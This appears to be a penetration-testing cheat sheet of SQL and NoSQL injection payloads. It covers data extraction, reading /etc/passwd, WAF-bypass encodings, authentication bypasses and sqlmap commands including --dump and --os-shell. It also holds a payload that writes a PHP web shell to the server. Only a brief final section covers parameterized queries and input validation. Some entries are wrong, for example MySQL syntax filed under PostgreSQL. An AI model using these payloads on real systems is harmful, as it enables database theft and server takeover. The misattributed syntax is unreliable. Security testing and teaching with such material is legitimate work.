SQL Injection Payloads
SQL Injection Payloads
Comprehensive collection of SQL injection payloads and bypass techniques for penetration testing.
Basic SQL Injection
Union-based Injection
-- Basic UNION
' UNION SELECT 1,2,3--
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT 1,2,3,4,5--
-- With column names
' UNION SELECT username,password,email FROM users--
' UNION SELECT table_name,column_name FROM information_schema.columns--
-- Multiple columns
' UNION SELECT 1,2,3,4,5,6,7,8,9,10--
Boolean-based Blind Injection
-- Basic boolean tests
' OR 1=1--
' OR '1'='1
' OR 1=1#
' OR 1=1/*
-- Conditional statements
' AND 1=1--
' AND 1=2--
' AND (SELECT COUNT(*) FROM users) > 0--
' AND (SELECT LENGTH(username) FROM users LIMIT 1) > 5--
Time-based Blind Injection
-- MySQL
' AND SLEEP(5)--
' AND (SELECT SLEEP(5))--
' AND IF(1=1,SLEEP(5),0)--
-- PostgreSQL
'; SELECT pg_sleep(5)--
' AND (SELECT pg_sleep(5))--
-- MSSQL
'; WAITFOR DELAY '00:00:05'--
' AND (SELECT COUNT(*) FROM sys.tables) > 0; WAITFOR DELAY '00:00:05'--
-- Oracle
' AND (SELECT COUNT(*) FROM all_tables) > 0 AND DBMS_LOCK.SLEEP(5)--
Database-specific Payloads
MySQL
-- Version detection
' UNION SELECT @@version--
' UNION SELECT VERSION()--
-- Database enumeration
' UNION SELECT SCHEMA_NAME FROM information_schema.schemata--
' UNION SELECT TABLE_NAME FROM information_schema.tables WHERE TABLE_SCHEMA=DATABASE()--
-- User enumeration
' UNION SELECT USER()--
' UNION SELECT CURRENT_USER()--
' UNION SELECT user,host FROM mysql.user--
-- File operations
' UNION SELECT LOAD_FILE('/etc/passwd')--
' UNION SELECT '<?php system($_GET[cmd]); ?>' INTO OUTFILE '/var/www/shell.php'--
PostgreSQL
-- Version detection
' UNION SELECT version()--
-- Database enumeration
' UNION SELECT datname FROM pg_database--
' UNION SELECT tablename FROM pg_tables--
-- User enumeration
' UNION SELECT current_user--
' UNION SELECT usename FROM pg_user--
-- File operations
' UNION SELECT pg_read_file('/etc/passwd')--
' UNION SELECT '<?php system($_GET[cmd]); ?>' INTO OUTFILE '/var/www/shell.php'--
MSSQL
-- Version detection
' UNION SELECT @@version--
' UNION SELECT SERVERPROPERTY('productversion')--
-- Database enumeration
' UNION SELECT name FROM sys.databases--
' UNION SELECT table_name FROM information_schema.tables--
-- User enumeration
' UNION SELECT SYSTEM_USER--
' UNION SELECT USER_NAME()--
' UNION SELECT name FROM sys.server_principals--
-- File operations
' UNION SELECT * FROM OPENROWSET('BULK','C:\\Windows\\System32\\drivers\\etc\\hosts','SINGLE_CLOB') AS x--
Oracle
-- Version detection
' UNION SELECT banner FROM v$version--
' UNION SELECT version FROM v$instance--
-- Database enumeration
' UNION SELECT table_name FROM all_tables--
' UNION SELECT column_name FROM all_tab_columns WHERE table_name='USERS'--
-- User enumeration
' UNION SELECT user FROM dual--
' UNION SELECT username FROM all_users--
-- File operations
' UNION SELECT UTL_FILE.FREAD('DIRECTORY','filename') FROM dual--
Advanced Bypass Techniques
WAF Bypass
-- Comment variations
'/**/UNION/**/SELECT/**/1,2,3--
'/*!UNION*//*!SELECT*/1,2,3--
'%0AUNION%0ASELECT%0A1,2,3--
-- Case variation
' UnIoN SeLeCt 1,2,3--
' uNiOn sElEcT 1,2,3--
-- Encoding bypass
' %55%4e%49%4f%4e %53%45%4c%45%43%54 1,2,3--
' %55nion %53elect 1,2,3--
-- Double encoding
' %2555%254e%2549%254f%254e %2553%2545%254c%2545%2543%2554 1,2,3--
Filter Bypass
-- Space replacement
'/**/UNION/**/SELECT/**/1,2,3--
'%09UNION%09SELECT%091,2,3--
'%0AUNION%0ASELECT%0A1,2,3--
'%0DUNION%0DSELECT%0D1,2,3--
'%0CUNION%0CSELECT%0C1,2,3--
'%0BUNION%0BSELECT%0B1,2,3--
-- Keyword replacement
' UNI/**/ON SEL/**/ECT 1,2,3--
' UNI%00ON SEL%00ECT 1,2,3--
' UNI%0aON SEL%0aECT 1,2,3--
Quote Bypass
-- Without quotes
' OR 1=1--
' OR 1=1#
' OR 1=1/*
-- With different quote types
' OR "1"="1--
' OR '1'='1--
' OR `1`=`1--
-- Hex encoding
' OR 0x31=0x31--
' OR CHAR(49)=CHAR(49)--
Error-based Injection
MySQL Error-based
-- Extract database name
' AND extractvalue(1,concat(0x7e,(SELECT database()),0x7e))--
' AND updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)--
-- Extract table names
' AND extractvalue(1,concat(0x7e,(SELECT table_name FROM information_schema.tables LIMIT 1),0x7e))--
-- Extract column names
' AND extractvalue(1,concat(0x7e,(SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 1),0x7e))--
PostgreSQL Error-based
-- Extract database name
' AND (SELECT * FROM (SELECT COUNT(*),CONCAT((SELECT database()),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--
-- Extract table names
' AND (SELECT * FROM (SELECT COUNT(*),CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--
Second-order SQL Injection
User Registration
-- Username field
admin'--
admin'/*
admin'#
-- Email field
admin@test.com'--
admin@test.com'/*
admin@test.com'#
Profile Update
-- Name field
' OR 1=1--
' OR '1'='1
' OR 1=1#
-- Bio field
' UNION SELECT username,password FROM users--
' UNION SELECT 1,2,3--
NoSQL Injection
MongoDB
// Basic injection
{"$ne": null}
{"$gt": ""}
{"$regex": ".*"}
// Authentication bypass
{"username": {"$ne": null}, "password": {"$ne": null}}
{"username": {"$gt": ""}, "password": {"$gt": ""}}
// Data extraction
{"$where": "this.username.match(/.*/)"}
{"$where": "this.password.match(/.*/)"}
CouchDB
// Basic injection
{"$ne": null}
{"$gt": ""}
// Authentication bypass
{"username": {"$ne": null}, "password": {"$ne": null}}
Automated Tools
SQLMap Commands
# Basic scan
sqlmap -u "http://target.com/page.php?id=1"
# With POST data
sqlmap -u "http://target.com/login.php" --data="username=admin&password=admin"
# With cookies
sqlmap -u "http://target.com/page.php?id=1" --cookie="PHPSESSID=abc123"
# Database enumeration
sqlmap -u "http://target.com/page.php?id=1" --dbs
sqlmap -u "http://target.com/page.php?id=1" --tables
sqlmap -u "http://target.com/page.php?id=1" --columns -T users
sqlmap -u "http://target.com/page.php?id=1" --dump -T users
# OS shell
sqlmap -u "http://target.com/page.php?id=1" --os-shell
Custom Scripts
# Python SQL injection tester
import requests
import time
def test_sql_injection(url, param, payload):
data = {param: payload}
start_time = time.time()
response = requests.post(url, data=data)
end_time = time.time()
if end_time - start_time > 4:
print(f"Time-based injection detected: {payload}")
elif "error" in response.text.lower():
print(f"Error-based injection detected: {payload}")
elif "success" in response.text.lower():
print(f"Boolean-based injection detected: {payload}")
# Test payloads
payloads = [
"' OR 1=1--",
"' UNION SELECT 1,2,3--",
"' AND SLEEP(5)--",
"' OR '1'='1"
]
for payload in payloads:
test_sql_injection("http://target.com/login.php", "username", payload)
Prevention and Mitigation
Parameterized Queries
# Python example
cursor.execute("SELECT * FROM users WHERE username = %s AND password = %s", (username, password))
# PHP example
$stmt = $pdo->prepare("SELECT * FROM users WHERE username = ? AND password = ?");
$stmt->execute([$username, $password]);
Input Validation
# Whitelist validation
allowed_chars = set('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789')
if not set(username).issubset(allowed_chars):
return "Invalid username"
# Length validation
if len(username) > 50:
return "Username too long"
Testing Checklist
- Test all input fields
- Test with different HTTP methods (GET, POST, PUT, DELETE)
- Test with different content types (application/x-www-form-urlencoded, application/json)
- Test with different encodings (URL, Base64, Hex)
- Test with different quote types (single, double, backtick)
- Test with different comment styles (–, #, /* */)
- Test with different space replacements
- Test with different case variations
- Test with different encoding bypasses
- Test with different WAF bypass techniques